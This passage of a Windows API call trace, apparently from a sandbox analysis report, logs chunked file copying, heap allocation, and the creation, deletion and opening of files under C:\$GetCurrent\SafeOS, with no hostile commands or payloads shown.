returned 0x0 [0060.081] SetLastError (dwErrCode=0x0) [0060.081] ReadFile (in: hFile=0x424, lpBuffer=0x8a210, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8a210*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0060.082] WriteFile (in: hFile=0x41c, lpBuffer=0x8b218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8b218*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0060.082] GetLastError () returned 0x0 [0060.082] SetLastError (dwErrCode=0x0) [0060.082] GetLastError () returned 0x0 [0060.082] SetLastError (dwErrCode=0x0) [0060.082] GetLastError () returned 0x0 [0060.082] SetLastError (dwErrCode=0x0) [0060.082] GetLastError () returned 0x0 [0060.082] SetLastError (dwErrCode=0x0) [0060.082] ReadFile (in: hFile=0x424, lpBuffer=0x8a210, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8a210*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0060.082] WriteFile (in: hFile=0x41c, lpBuffer=0x8b218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8b218*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0060.083] GetLastError () returned 0x0 [0060.083] SetLastError (dwErrCode=0x0) [0060.083] GetLastError () returned 0x0 [0060.083] SetLastError (dwErrCode=0x0) [0060.083] GetLastError () returned 0x0 [0060.083] SetLastError (dwErrCode=0x0) [0060.083] GetLastError () returned 0x0 [0060.083] SetLastError (dwErrCode=0x0) [0060.083] ReadFile (in: hFile=0x424, lpBuffer=0x8a210, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8a210*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0060.083] WriteFile (in: hFile=0x41c, lpBuffer=0x8b218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8b218*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0060.083] GetLastError () returned 0x0 [0060.083] SetLastError (dwErrCode=0x0) [0060.083] GetLastError () returned 0x0 [0060.083] SetLastError (dwErrCode=0x0) [0060.083] GetLastError () returned 0x0 [0060.083] SetLastError (dwErrCode=0x0) [0060.083] GetLastError () returned 0x0 [0060.083] SetLastError (dwErrCode=0x0) [0060.083] ReadFile (in: hFile=0x424, lpBuffer=0x8a210, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8a210*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0060.083] WriteFile (in: hFile=0x41c, lpBuffer=0x8b218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8b218*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0060.084] GetLastError () returned 0x0 [0060.084] SetLastError (dwErrCode=0x0) [0060.084] GetLastError () returned 0x0 [0060.084] SetLastError (dwErrCode=0x0) [0060.084] GetLastError () returned 0x0 [0060.084] SetLastError (dwErrCode=0x0) [0060.084] GetLastError () returned 0x0 [0060.084] SetLastError (dwErrCode=0x0) [0060.084] ReadFile (in: hFile=0x424, lpBuffer=0x8a210, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8a210*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0060.084] WriteFile (in: hFile=0x41c, lpBuffer=0x8b218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8b218*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0060.084] GetLastError () returned 0x0 [0060.084] SetLastError (dwErrCode=0x0) [0060.084] GetLastError () returned 0x0 [0060.084] SetLastError (dwErrCode=0x0) [0060.084] GetLastError () returned 0x0 [0060.084] SetLastError (dwErrCode=0x0) [0060.084] GetLastError () returned 0x0 [0060.084] SetLastError (dwErrCode=0x0) [0060.084] ReadFile (in: hFile=0x424, lpBuffer=0x8a210, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8a210*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0060.085] WriteFile (in: hFile=0x41c, lpBuffer=0x8b218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8b218*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0060.085] GetLastError () returned 0x0 [0060.085] SetLastError (dwErrCode=0x0) [0060.085] GetLastError () returned 0x0 [0060.085] SetLastError (dwErrCode=0x0) [0060.085] GetLastError () returned 0x0 [0060.085] SetLastError (dwErrCode=0x0) [0060.085] GetLastError () returned 0x0 [0060.085] SetLastError (dwErrCode=0x0) [0060.085] ReadFile (in: hFile=0x424, lpBuffer=0x8a210, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8a210*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0060.085] WriteFile (in: hFile=0x41c, lpBuffer=0x8b218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8b218*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0060.085] GetLastError () returned 0x0 [0060.085] SetLastError (dwErrCode=0x0) [0060.085] GetLastError () returned 0x0 [0060.085] SetLastError (dwErrCode=0x0) [0060.085] GetLastError () returned 0x0 [0060.085] SetLastError (dwErrCode=0x0) [0060.085] GetLastError () returned 0x0 [0060.085] SetLastError (dwErrCode=0x0) [0060.086] ReadFile (in: hFile=0x424, lpBuffer=0x8a210, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8a210*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0060.086] WriteFile (in: hFile=0x41c, lpBuffer=0x8b218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8b218*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0060.086] GetLastError () returned 0x0 [0060.086] SetLastError (dwErrCode=0x0) [0060.086] GetLastError () returned 0x0 [0060.086] SetLastError (dwErrCode=0x0) [0060.086] GetLastError () returned 0x0 [0060.086] SetLastError (dwErrCode=0x0) [0060.086] GetLastError () returned 0x0 [0060.086] SetLastError (dwErrCode=0x0) [0060.086] ReadFile (in: hFile=0x424, lpBuffer=0x8a210, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8a210*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0060.086] WriteFile (in: hFile=0x41c, lpBuffer=0x8b218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8b218*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0060.086] GetLastError () returned 0x0 [0060.086] SetLastError (dwErrCode=0x0) [0060.086] GetLastError () returned 0x0 [0060.086] SetLastError (dwErrCode=0x0) [0060.086] GetLastError () returned 0x0 [0060.086] SetLastError (dwErrCode=0x0) [0060.087] GetLastError () returned 0x0 [0060.087] SetLastError (dwErrCode=0x0) [0060.087] ReadFile (in: hFile=0x424, lpBuffer=0x8a210, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8a210*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0060.087] WriteFile (in: hFile=0x41c, lpBuffer=0x8b218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8b218*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0060.087] GetLastError () returned 0x0 [0060.087] SetLastError (dwErrCode=0x0) [0060.087] GetLastError () returned 0x0 [0060.087] SetLastError (dwErrCode=0x0) [0060.087] GetLastError () returned 0x0 [0060.087] SetLastError (dwErrCode=0x0) [0060.087] GetLastError () returned 0x0 [0060.087] SetLastError (dwErrCode=0x0) [0060.087] ReadFile (in: hFile=0x424, lpBuffer=0x8a210, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8a210*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0060.087] WriteFile (in: hFile=0x41c, lpBuffer=0x8b218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8b218*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0060.087] GetLastError () returned 0x0 [0060.087] SetLastError (dwErrCode=0x0) [0060.087] GetLastError () returned 0x0 [0060.088] SetLastError (dwErrCode=0x0) [0060.088] GetLastError () returned 0x0 [0060.088] SetLastError (dwErrCode=0x0) [0060.088] GetLastError () returned 0x0 [0060.088] SetLastError (dwErrCode=0x0) [0060.088] ReadFile (in: hFile=0x424, lpBuffer=0x8a210, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8a210*, lpNumberOfBytesRead=0x327f0c4*=0x2c8, lpOverlapped=0x0) returned 1 [0060.088] ReadFile (in: hFile=0x424, lpBuffer=0x8a210, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8a210*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0060.088] WriteFile (in: hFile=0x41c, lpBuffer=0x8b218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8b218*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0060.185] GetLastError () returned 0x0 [0060.185] SetLastError (dwErrCode=0x0) [0060.185] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf00 [0060.185] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d660 [0060.185] GetLastError () returned 0x0 [0060.185] SetLastError (dwErrCode=0x0) [0060.185] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d6d8 | out: hHeap=0x20000) returned 1 [0060.185] WriteFile (in: hFile=0x41c, lpBuffer=0x8b218*, nNumberOfBytesToWrite=0x2d0, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x8b218*, lpNumberOfBytesWritten=0x327ef70*=0x2d0, lpOverlapped=0x0) returned 1 [0060.185] GetLastError () returned 0x0 [0060.185] SetLastError (dwErrCode=0x0) [0060.185] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0060.185] GetLastError () returned 0x0 [0060.185] SetLastError (dwErrCode=0x0) [0060.185] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0060.185] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: hHeap=0x20000) returned 1 [0060.185] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d660 | out: hHeap=0x20000) returned 1 [0060.185] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0060.185] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a4b0 | out: hHeap=0x20000) returned 1 [0060.186] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b218 | out: hHeap=0x20000) returned 1 [0060.186] CloseHandle (hObject=0x41c) returned 1 [0060.189] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a210 | out: hHeap=0x20000) returned 1 [0060.189] CloseHandle (hObject=0x424) returned 1 [0060.189] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0060.190] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0060.190] AreFileApisANSI () returned 1 [0060.190] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e2d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 41 [0060.190] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x52) returned 0x67540 [0060.190] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e2d0, cbMultiByte=-1, lpWideCharStr=0x67540, cchWideChar=41 | out: lpWideCharStr="C:\\$GetCurrent\\SafeOS\\GetCurrentOOBE.dll") returned 41 [0060.190] CreateFileW (lpFileName="C:\\$GetCurrent\\SafeOS\\GetCurrentOOBE.dll" (normalized: "c:\\$getcurrent\\safeos\\getcurrentoobe.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0060.191] GetFileType (hFile=0x424) returned 0x1 [0060.191] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x67540 | out: hHeap=0x20000) returned 1 [0060.192] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8a210 [0060.192] GetLastError () returned 0xb7 [0060.192] SetLastError (dwErrCode=0xb7) [0060.192] WriteFile (in: hFile=0x424, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0060.194] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a210 | out: hHeap=0x20000) returned 1 [0060.194] CloseHandle (hObject=0x424) returned 1 [0060.194] AreFileApisANSI () returned 1 [0060.194] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e2d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 41 [0060.194] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x52) returned 0x66f40 [0060.194] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e2d0, cbMultiByte=-1, lpWideCharStr=0x66f40, cchWideChar=41 | out: lpWideCharStr="C:\\$GetCurrent\\SafeOS\\GetCurrentOOBE.dll") returned 41 [0060.194] DeleteFileW (lpFileName="C:\\$GetCurrent\\SafeOS\\GetCurrentOOBE.dll" (normalized: "c:\\$getcurrent\\safeos\\getcurrentoobe.dll")) returned 1 [0060.195] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x66f40 | out: hHeap=0x20000) returned 1 [0060.195] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0060.195] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0060.195] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0060.195] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0060.195] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0060.195] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0060.195] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0060.195] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d510 | out: hHeap=0x20000) returned 1 [0060.195] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d720 | out: hHeap=0x20000) returned 1 [0060.195] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85fc0 | out: hHeap=0x20000) returned 1 [0060.195] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x30fc0 | out: hHeap=0x20000) returned 1 [0060.195] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0060.195] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0060.195] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0060.195] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0060.195] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfb0 | out: hHeap=0x20000) returned 1 [0060.195] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0060.195] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.195] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.195] FindNextFileW (in: hFindFile=0x78950, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956819aa, ftCreationTime.dwHighDateTime=0x1d3273b, ftLastAccessTime.dwLowDateTime=0x956819aa, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x980eecb6, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x9c, dwReserved0=0x23, dwReserved1=0x0, cFileName="GetCurrentRollback.ini", cAlternateFileName="GETCUR~1.INI")) returned 1 [0060.195] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0060.195] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0060.195] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0060.195] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0060.196] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0060.196] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0060.196] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0060.196] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0060.196] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0060.196] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0060.196] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0060.196] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0060.196] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0060.196] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0060.196] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0060.196] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0060.196] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0060.196] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0060.196] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0060.196] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0060.196] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e110 [0060.196] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71620 [0060.196] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0060.196] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e110 | out: hHeap=0x20000) returned 1 [0060.196] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x717c0 [0060.196] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0060.196] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.196] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.196] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.196] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.196] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0060.196] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0060.196] AreFileApisANSI () returned 1 [0060.196] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\$GetCurrent\\SafeOS\\GetCurrentRollback.ini", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\$GetCurrent\\SafeOS\\GetCurrentRollback.ini", lpUsedDefaultChar=0x0) returned 45 [0060.196] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0060.196] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.196] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.196] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0060.197] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0060.197] AreFileApisANSI () returned 1 [0060.197] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0060.197] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x716f0 [0060.197] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x716f0, cchWideChar=45 | out: lpWideCharStr="C:\\$GetCurrent\\SafeOS\\GetCurrentRollback.ini") returned 45 [0060.197] CreateFileW (lpFileName="C:\\$GetCurrent\\SafeOS\\GetCurrentRollback.ini" (normalized: "c:\\$getcurrent\\safeos\\getcurrentrollback.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0060.197] GetFileType (hFile=0x424) returned 0x1 [0060.197] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x716f0 | out: hHeap=0x20000) returned 1 [0060.197] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0060.197] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0060.197] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0060.198] CloseHandle (hObject=0x424) returned 1 [0060.198] AreFileApisANSI () returned 1 [0060.198] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0060.198] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x715b8 [0060.198] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x715b8, cchWideChar=45 | out: lpWideCharStr="C:\\$GetCurrent\\SafeOS\\GetCurrentRollback.ini") returned 45 [0060.198] CreateFileW (lpFileName="C:\\$GetCurrent\\SafeOS\\GetCurrentRollback.ini" (normalized: "c:\\$getcurrent\\safeos\\getcurrentrollback.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0060.198] GetFileType (hFile=0x424) returned 0x1 [0060.198] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0060.198] CloseHandle (hObject=0x424) returned 1 [0060.198] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0060.198] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0060.198] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0060.198] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0060.198] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0060.198] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0060.198] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0060.198] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0060.198] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0060.199] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0060.199] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0060.199] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0060.199] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0060.199] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0060.199] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0060.199] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0060.199] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0060.199] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0060.199] 